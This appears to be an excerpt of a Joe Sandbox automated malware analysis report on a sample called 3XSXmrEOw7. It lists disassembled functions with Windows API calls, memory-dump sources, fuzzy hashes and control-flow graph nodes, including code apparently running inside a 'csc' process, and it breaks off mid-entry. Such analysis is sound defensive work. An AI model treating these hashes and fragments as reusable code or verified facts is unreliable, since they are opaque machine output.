                                                                                                                                                • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000020,004252A6,?,0044C9A0,0000000C,0041AB0C,00000000,?,?,00446A11,004044BD), ref: 0042C798
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterSection$__lock
                                                                                                                                              • String ID: `jE
                                                                                                                                              • API String ID: 3410214836-775037952
                                                                                                                                              • Opcode ID: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                                              • Instruction ID: e25f03711a34877e1c848d10ee6b2a6bf970461377bf0363c61bc6c07be673b1
                                                                                                                                              • Opcode Fuzzy Hash: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                                              • Instruction Fuzzy Hash: 9BD022B6B0010203DF282676EEC950E3208D2823037EA8C3BF802C3282CF2CDD80840D
                                                                                                                                              Function 00429C5F Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?), ref: 00429C86
                                                                                                                                              • HeapAlloc.KERNEL32(00000008,000041C4), ref: 00429CBF
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00429CDD
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00429CF4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocHeap$FreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3499195154-0
                                                                                                                                              • Opcode ID: ea70e5c13c1f21d78355e85d9dd63a5838c77a33c2fad09f6ad6cd3bd0747de8
                                                                                                                                              • Instruction ID: dfb89f136970734709b6813ad249d643eab4b97aebf48e034e9fa728ed28f66c
                                                                                                                                              • Opcode Fuzzy Hash: ea70e5c13c1f21d78355e85d9dd63a5838c77a33c2fad09f6ad6cd3bd0747de8
                                                                                                                                              • Instruction Fuzzy Hash: 0F116D302006019FD7328F29FD45A2A7BF6FB86764B60492EF256D31B1C3B09846DF18
                                                                                                                                              Function 00443834 Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443862
                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443874
                                                                                                                                              • LeaveCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 0044387D
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D), ref: 0044388F
                                                                                                                                                • Part of subcall function 004437CB: InitializeCriticalSection.KERNEL32(00480774,00443842,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D,?,0047EA90), ref: 004437E3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 713024617-0
                                                                                                                                              • Opcode ID: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                                              • Instruction ID: 3b45dfc569fa32815649505fb739a58a282b546805a0b9d948b316ba2df3f3b5
                                                                                                                                              • Opcode Fuzzy Hash: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                                              • Instruction Fuzzy Hash: 82F06D7101020ADFE750AF94EC84A5AF3ACFB15716F00083BE14083011D738F658CBA8

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:7.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:17
                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                              execution_graph 35650 6afeea8 35651 6afeee8 CloseHandle 35650->35651 35653 6afef19 35651->35653 35654 9808308 35655 980831d 35654->35655 35657 98086da 35655->35657 35659 9808669 35657->35659 35658 98087d4 35658->35655 35659->35657 35659->35658 35661 97c1c88 35659->35661 35664 97c1c93 35661->35664 35662 97c1e94 35662->35659 35663 97c1d20 KiUserExceptionDispatcher 35663->35664 35664->35662 35664->35663 35665 6afec40 35667 6afec53 35665->35667 35669 6afecf8 35667->35669 35670 6afed40 VirtualProtect 35669->35670 35672 6afecdb 35670->35672

                                                                                                                                              Executed Functions

                                                                                                                                              Function 09930040 Relevance: 17.4, Strings: 13, Instructions: 1177COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,aq$4$T'[$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-2585721871
                                                                                                                                              • Opcode ID: 4f1e25b67b5ade2257d00d0c31f042960915d07883b3ab3a7b7ea25db23bffa0
                                                                                                                                              • Instruction ID: ace9342b87d7e4529518a2c8b3957e24970e28cf3a2cda74f2263a19a2cf963f
                                                                                                                                              • Opcode Fuzzy Hash: 4f1e25b67b5ade2257d00d0c31f042960915d07883b3ab3a7b7ea25db23bffa0
                                                                                                                                              • Instruction Fuzzy Hash: 84B22634A002188FDB14CFA9C895BADB7BAFF88700F558599E545AB3A5DB70EC81CF50
                                                                                                                                              Function 09930367 Relevance: 9.2, Strings: 7, Instructions: 495COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,aq$4$T'[$$]q$$]q$$]q$$]q
                                                                                                                                              • API String ID: 0-3939105665
                                                                                                                                              • Opcode ID: 74bf1a2e3ef6e3d4c555f5f8e8f4ec6601fabdba202e956533c48c39885f2458
                                                                                                                                              • Instruction ID: f01b99420dfee68f088ec00e3a2edbc10e85675c132943eb0d41152af47560b5
                                                                                                                                              • Opcode Fuzzy Hash: 74bf1a2e3ef6e3d4c555f5f8e8f4ec6601fabdba202e956533c48c39885f2458
                                                                                                                                              • Instruction Fuzzy Hash: A0221A34A00219CFDB64CF69C995BADB7B6FF48300F5481A9E549AB3A5DB30AD81CF50
                                                                                                                                              Function 095E18A2 Relevance: 1.9, Strings: 1, Instructions: 662COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 2
                                                                                                                                              • API String ID: 0-450215437
                                                                                                                                              • Opcode ID: d141d561ca2a483fb5941f8af851b78596a0400db4ef9affc1d3b85318774d43
                                                                                                                                              • Instruction ID: 5c9d716a091f0466be2b638ccad954230c5e62727ef18060ba453b2722541700
                                                                                                                                              • Opcode Fuzzy Hash: d141d561ca2a483fb5941f8af851b78596a0400db4ef9affc1d3b85318774d43
                                                                                                                                              • Instruction Fuzzy Hash: 6B525C70A012458FCB59EF69C990B9DBBF2BF89300F1084A9E50ADB3A5EB359D44CF51
                                                                                                                                              Function 095E22C3 Relevance: .4, Instructions: 355COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8d01e39757584b653ddd40a927827b961982278087ffb23d919019b9da8acc6d
                                                                                                                                              • Instruction ID: b336a90c4bac7b82800f09f8becba7cb68b81a71c07bfa5d248fa20a00cdb273
                                                                                                                                              • Opcode Fuzzy Hash: 8d01e39757584b653ddd40a927827b961982278087ffb23d919019b9da8acc6d
                                                                                                                                              • Instruction Fuzzy Hash: 6FF14874A00224CFCB58DF29C994AA8B7F6BF88300F5585D9D91A9B365DB31ED82CF40
                                                                                                                                              Function 099345E0 Relevance: 18.0, Strings: 14, Instructions: 488COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 99345e0-99345fa 2 99345ff-993460c 0->2 3 99345fc 0->3 5 9934655 2->5 6 993460e-9934614 2->6 3->2 10 993465e-9934666 5->10 7 9934616-9934618 6->7 8 9934648-9934650 6->8 7->8 11 993461a-9934643 7->11 9 9934aa8-9934aaf 8->9 12 9934668 10->12 13 993466f-9934675 10->13 11->9 12->13 14 9934753-9934763 12->14 15 9934893-9934896 12->15 16 9934831-993484a 12->16 17 9934790-99347b1 12->17 18 99348b5-99348c5 12->18 19 99346fa-9934706 12->19 20 993481e-993482c 12->20 21 99346be-99346d7 12->21 22 99348fe-993490a 12->22 23 993477d-993478b 12->23 24 99346dc-99346f5 12->24 25 99347e2-99347fb 12->25 26 9934682-993469b 12->26 27 9934800-9934819 12->27 28 99346a0-99346b9 12->28 29 99348ca-99348e4 12->29 30 99348e9-99348f9 12->30 31 9934768-9934778 12->31 32 993484f-9934868 12->32 33 99347cd-99347dd 12->33 34 993486d-993488e 12->34 13->22 35 993467b 13->35 14->9 37 9934898-993489d 15->37 38 993489f 15->38 16->9 82 99347b3-99347b5 17->82 83 99347b7-99347c1 17->83 18->9 39 9934744-993474e 19->39 40 9934708-993473f 19->40 20->9 21->9 41 9934910-9934913 22->41 42 993490c-993490e 22->42 23->9 24->9 25->9 26->9 27->9 28->9 29->9 30->9 31->9 32->9 33->9 34->9 35->15 35->18 35->26 35->29 35->30 35->34 58 99348a4-99348b0 37->58 38->58 39->9 40->9 63 993491b-993491f 41->63 42->63 58->9 64 9934921-9934929 63->64 65 993492e-9934934 63->65 64->9 68 9934aa0-9934aa6 65->68 69 993493a-9934952 65->69 68->9 87 9934954-9934963 call 9931bd0 69->87 88 993497f-9934989 69->88 86 99347c3-99347c8 82->86 83->86 86->9 87->88 99 9934965-9934978 87->99 92 9934a62-9934a66 88->92 93 993498f-993499a 88->93 92->68 94 9934a68-9934a6d 92->94 96 99349aa-99349b0 93->96 97 993499c-99349a7 93->97 102 9934a76 94->102 103 9934a6f-9934a74 94->103 100 99349b2-99349bd 96->100 101 99349c0-99349c4 96->101 97->96 99->88 105 993497a 99->105 100->101 106 99349c6-99349cc 101->106 107 9934a2a-9934a2f 101->107 104 9934a7b-9934a9e 102->104 103->104 104->9 105->88 108 99349e4-99349ea 106->108 109 99349ce-99349de 106->109 110 9934a31-9934a36 107->110 111 9934a38 107->111 113 9934a0b-9934a1a 108->113 114 99349ec-99349fb 108->114 109->108 121 9934ab2-9934ad2 109->121 115 9934a3d-9934a60 110->115 111->115 113->107 118 9934a1c-9934a27 113->118 114->113 117 99349fd-9934a08 114->117 115->9 117->113 118->107 125 9934ae5-9934afe 121->125 126 9934ad4-9934ae3 121->126 129 9934b00-9934b98 125->129 126->129 135 9934ba3-9934baf 129->135 136 9934b9a 129->136 140 9934bb1-9934bb6 135->140 141 9934bb8-9934bc4 135->141 136->135 137 9934ba1 136->137 138 9934c11-9934c13 137->138 140->138 143 9934bc6-9934bcb 141->143 144 9934bcd-9934bd9 141->144 143->138 146 9934be2-9934bee 144->146 147 9934bdb-9934be0 144->147 149 9934bf0-9934bf5 146->149 150 9934bf7-9934c03 146->150 147->138 149->138 152 9934c05-9934c0a 150->152 153 9934c0c 150->153 152->138 153->138
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (_]q$HD[$TC[$h3[$h3[$l0[$p1[$t/[$t/[$t2[$|.[$$]q$8[$9[
                                                                                                                                              • API String ID: 0-45626090
                                                                                                                                              • Opcode ID: f85b5ca3f868ce666a72ffaf11045b80418dd6de9209d71efb5d139de9287eea
                                                                                                                                              • Instruction ID: 992e94f60f5c947b6eb2f928f4d9da86e22607868479056471e089d1d8739a18
                                                                                                                                              • Opcode Fuzzy Hash: f85b5ca3f868ce666a72ffaf11045b80418dd6de9209d71efb5d139de9287eea
                                                                                                                                              • Instruction Fuzzy Hash: 0C02E0307042428FDB999F29C89176E7BF6FF95300F66846DE582DB3A1DA34CC4187A6
                                                                                                                                              Function 0A5D3230 Relevance: 7.9, Strings: 6, Instructions: 377COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 978 a5d3230-a5d323d 979 a5d323f-a5d3244 978->979 980 a5d32b3-a5d334f 978->980 981 a5d3246-a5d324a 979->981 982 a5d3252-a5d3259 979->982 1000 a5d335f-a5d3368 980->1000 1001 a5d3351-a5d335d 980->1001 1057 a5d324d call a5d3580 981->1057 1058 a5d324d call a5d3230 981->1058 1059 a5d324d call a5d3543 981->1059 985 a5d325f-a5d3280 982->985 984 a5d3250 984->985 991 a5d32a9-a5d32b0 985->991 992 a5d3282-a5d32a4 985->992 992->991 1002 a5d336a-a5d336d 1000->1002 1003 a5d3377-a5d3384 1000->1003 1005 a5d3388-a5d33ae 1001->1005 1002->1003 1003->1005 1007 a5d33c7-a5d33d0 1005->1007 1008 a5d33b0-a5d33c5 1005->1008 1009 a5d33df-a5d33f5 1007->1009 1010 a5d33d2-a5d33d5 1007->1010 1012 a5d33f9-a5d3414 1008->1012 1009->1012 1010->1009 1013 a5d341c-a5d341e 1012->1013 1014 a5d3416 1012->1014 1017 a5d3425-a5d3427 1013->1017 1015 a5d3418-a5d341a 1014->1015 1016 a5d3420 1014->1016 1015->1013 1015->1016 1016->1017 1018 a5d342d-a5d3437 1017->1018 1019 a5d35d6-a5d36ad 1017->1019 1020 a5d3439-a5d344e 1018->1020 1021 a5d3456-a5d3495 1018->1021 1038 a5d36af-a5d36b5 1019->1038 1039 a5d36b6-a5d36c1 1019->1039 1020->1021 1025 a5d3568-a5d357d 1021->1025 1026 a5d349b-a5d350d 1021->1026 1025->1019 1044 a5d3513-a5d3562 1026->1044 1038->1039 1040 a5d36f3-a5d3708 1039->1040 1041 a5d36c3-a5d3719 1039->1041 1052 a5d373a-a5d374a 1040->1052 1050 a5d371b 1041->1050 1051 a5d3723-a5d3727 1041->1051 1044->1025 1044->1026 1050->1051 1054 a5d3729-a5d372d 1051->1054 1055 a5d3737 1051->1055 1054->1055 1056 a5d372f 1054->1056 1055->1052 1056->1055 1057->984 1058->984 1059->984
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$4c]q$4c]q$4c]q$4c]q$Haq
                                                                                                                                              • API String ID: 0-535247161
                                                                                                                                              • Opcode ID: 02bcc32273e64230ae0aff903f3e604b8c456f4b4a658012cca069ea40e8880c
                                                                                                                                              • Instruction ID: 68777141ed36b52593199691bf1d0d3c01772d8ffb3beab8062a91d04982f6d1
                                                                                                                                              • Opcode Fuzzy Hash: 02bcc32273e64230ae0aff903f3e604b8c456f4b4a658012cca069ea40e8880c
                                                                                                                                              • Instruction Fuzzy Hash: 02E16F75E00208DFCB54DFA9D584A9EBBF6FF88310F248569E815AB350DB30AD46CB91
                                                                                                                                              Function 0993DD68 Relevance: 7.9, Strings: 6, Instructions: 366COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1060 993dd68-993dd88 1061 993dea1-993dec6 1060->1061 1062 993dd8e-993dd92 1060->1062 1064 993decd-993def2 1061->1064 1063 993dd98-993dda1 1062->1063 1062->1064 1065 993dda7-993ddce 1063->1065 1066 993def9-993df2f 1063->1066 1064->1066 1077 993de96-993dea0 1065->1077 1078 993ddd4-993ddd6 1065->1078 1084 993df36-993df8c 1066->1084 1079 993ddf7-993ddf9 1078->1079 1080 993ddd8-993dddb 1078->1080 1082 993ddfc-993de00 1079->1082 1083 993dde1-993ddeb 1080->1083 1080->1084 1087 993de02-993de11 1082->1087 1088 993de61-993de6d 1082->1088 1083->1084 1085 993ddf1-993ddf5 1083->1085 1098 993dfb0-993dfc7 1084->1098 1099 993df8e-993dfa2 1084->1099 1085->1079 1085->1082 1087->1084 1093 993de17-993de5e 1087->1093 1088->1084 1089 993de73-993de90 1088->1089 1089->1077 1089->1078 1093->1088 1106 993e0b7-993e0c7 1098->1106 1107 993dfcd-993e0b2 call 9937e68 call 9937870 call 993cf70 call 9937870 call 9937ea8 call 993bef8 call 9937870 call 993a758 call 9938710 1098->1107 1176 993dfa5 call 993e482 1099->1176 1177 993dfa5 call 993e560 1099->1177 1178 993dfa5 call 993e5e8 1099->1178 1179 993dfa5 call 993e488 1099->1179 1105 993dfab 1109 993e1d9-993e1e4 1105->1109 1118 993e1b4-993e1d0 call 9937870 1106->1118 1119 993e0cd-993e1a6 call 9937e68 * 2 call 9938620 call 9937870 call 993cf70 call 9937870 call 9937b20 call 9937fb8 call 9937870 1106->1119 1107->1106 1115 993e213-993e234 call 9937fb8 1109->1115 1116 993e1e6-993e1f6 1109->1116 1129 993e206-993e20e call 9938710 1116->1129 1130 993e1f8-993e1fe 1116->1130 1118->1109 1173 993e1b1 1119->1173 1174 993e1a8 1119->1174 1129->1115 1130->1129 1173->1118 1174->1173 1176->1105 1177->1105 1178->1105 1179->1105
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$(aq$<5[$<5[$Haq$l`[
                                                                                                                                              • API String ID: 0-1051239135
                                                                                                                                              • Opcode ID: 2f6175bf650d1e037339c98b247b58953bf67342a91237f0d58e1386ef19d9ba
                                                                                                                                              • Instruction ID: b0ecb4cff14c1c70054f778e0e6af3c1feddf9c45744c4f433ec2851661ea37e
                                                                                                                                              • Opcode Fuzzy Hash: 2f6175bf650d1e037339c98b247b58953bf67342a91237f0d58e1386ef19d9ba
                                                                                                                                              • Instruction Fuzzy Hash: D1F14234A00209DFCB44EFA4D59499EBBB6FF89300F51C569E406AB3A5DB31EC46CB91
                                                                                                                                              Function 0993B198 Relevance: 6.5, Strings: 5, Instructions: 289COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1180 993b198-993b239 call 9938580 call 9938620 1191 993b242-993b284 call 9938620 1180->1191 1192 993b23b-993b240 1180->1192 1193 993b287-993b291 1191->1193 1192->1193 1194 993b393-993b46f call 993af80 call 993a758 call 9938710 call 9937e68 * 2 call 9937fb8 call 993af80 call 993a758 1193->1194 1195 993b297-993b38e call 993a758 call 9937870 call 993a758 call 9938710 call 993a758 1193->1195 1245 993b471-993b49d 1194->1245 1246 993b4aa-993b4af 1194->1246 1195->1194 1245->1246 1258 993b49f-993b4a5 call 9937b20 1245->1258 1268 993b4b2 call 993aee9 1246->1268 1269 993b4b2 call 993aef8 1246->1269 1249 993b4b8-993b515 call 993af80 call 993a758 call 9937ea8 1265 993b520 1249->1265 1266 993b517 1249->1266 1258->1246 1267 993b521 1265->1267 1266->1265 1267->1267 1268->1249 1269->1249
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
